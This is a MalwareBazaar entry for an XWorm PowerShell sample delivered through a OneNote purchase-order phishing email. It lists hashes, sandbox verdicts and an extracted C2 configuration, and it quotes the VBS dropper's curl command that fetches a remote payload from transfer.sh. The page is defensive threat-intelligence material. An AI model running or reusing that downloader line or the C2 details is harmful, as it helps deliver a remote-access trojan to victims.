MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


XWorm


Vendor detections: 10


Intelligence 10 IOCs YARA 1 File information Comments 1
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424
SHA3-384 hash: 1c1981ba37bb4ba1ecf5efda87d8d71a3bfb610736c214b610c945507d8c5335ce0ee727652087bf090d7733189ce723
SHA1 hash: 48ca53702e02f4e3e1c5a3af765909dd3496ccde
MD5 hash: bd5d0e34444ce843ceaf89e3d043689b
humanhash: lithium-robert-paris-shade
File name:transfer.sh_get_44Y2u7_gh.ps1
Download: download sample
Signature XWorm
Create hunting rule
File size:3'145'161 bytes
First seen:2023-02-03 18:25:23 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 49152:zY1wOeTfeinwRg0Yd0YtWdR2++BqkPiblNmBZOqsHtL3rdyW6JKHINYMpnkq/3+k:R
Threatray 622 similar samples on MalwareBazaar
TLSH T183E51136CA31BCD4871C3700A7251CAF21A96557D3F74E28CB162CBA3D72B52EF65988
Reporter c_APT_ure
Tags:OneNote ps1 vbs xworm


Avatar
c_APT_ure
#OneNote #VBS #Xworm

Date: Wed, 1 Feb 2023 15:39:33 +0000 (UTC)
From: Sohail Qamar <ringelresources@zoho.com>
Subject: FW: PO_OCT03-22

052800a764dd7d31e244a10b299e666c PO2041032.one
bf7fe9c6c486d15a4da480c3e6d12396 PO2041032_content/OneNoteAttachments/new.vbs

runCmd = "cmd.exe /c curl hXXps://transfer\.sh/get/44Y2u7/gh.ps1 --output " + myVar + "\rr.ps1"

bd5d0e34444ce843ceaf89e3d043689b transfer.sh_get_44Y2u7_gh.ps1

--- malware config extracted ---
Malware Configuration Extractor: Xworm {
"C2 url": "147.185.221\.223",
"Port": "30420",
"Install file": "USB.exe",
"Aes key": "<123456789>"
}

Intelligence

File Origin
# of uploads :
1
# of downloads :
240
Origin country :
CH CH
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Generic-EXE.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.PUA.Base64EXE-2.UNOFFICIAL
Create hunting rule

Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
obfuscated packed
Link:
https://www.filescan.io/uploads/63dd51bc696b2d97257531d5/reports/95520205-120a-4c3b-a94d-3d13cf7dd99d/overview
Verdict:
Malicious
Labled as:
PowerShell/RiskWare.Inject
Link:
https://www.hybrid-analysis.com/sample/b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424
Result
Verdict:
MALICIOUS
Result
Threat name:
XWorm
Create hunting rule
Detection:
malicious
Classification:
troj.evad
Score:
88 / 100
Link:
https://www.joesandbox.com/analysis/1165351
Signature
.NET source code contains potential unpacker
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Writes to foreign memory regions
Yara detected XWorm
Behaviour
Behavior Graph:
Download SVG
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424/
Threat name:
Script-PowerShell.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2023-02-01 15:53:19 UTC
File Type:
Text (VBS)
AV detection:
4 of 38 (10.53%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wtot5ezvmmu4a5wa2lgvvqykqbw26rqanpnycgmtkwks5hmusqsa._file
Verdict:
malicious
Similar samples:
096e33b9b0b4f843a7ea0259f75b4370f00ab90f3807eb89d5f0117da762900d
XWorm
0cff2bf05a9fe4f1c1953d1c1be3642fe955775a84ea109464fccb4ffb5bba09
XWorm
2c24d359f441614a46f56ce5c94a361cdfd03cd1bf91a99b1183675d6bf362a9
XWorm
38d5e22812d54ff37736eed314bbf4dbb8ab42a4c0129e164c002571da77d6a3
XWorm
6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
XWorm
afc1d8fda05e0a3970030ceaf91c79926441bc1549de9841e43ce36947c6f59a
XWorm
b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424
XWorm
d88fc6590c4f50373cce292ca245fa77c0a3cecbab48564b8ef70c1051aa0aa6
XWorm
ef106973aa35c6a1e39e05c6dde63e421794faba9109a2a9cb2f9cebd363e053
XWorm
+ 612 additional samples on MalwareBazaar
Result
Malware family:
xworm
Create hunting rule
Score:
  10/10
Tags:
family:xworm rat trojan
Link:
https://tria.ge/reports/230203-w26y8age63/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetThreadContext
Xworm
Malware Config
C2 Extraction:
147.185.221.223:30420
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/b4dd3e933563/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ClamAV_Emotet_String_Aggregate
Create hunting rule

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

XWorm

PowerShell (PS) ps1 b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments


Avatar
TomU | I'm still here... til the end commented on 2023-02-03 18:25:52 UTC

https://bazaar.abuse.ch/sample/db53c5052be26fbe49e0430fc1d60ab602d87918cad8dd7892974316c3eff0be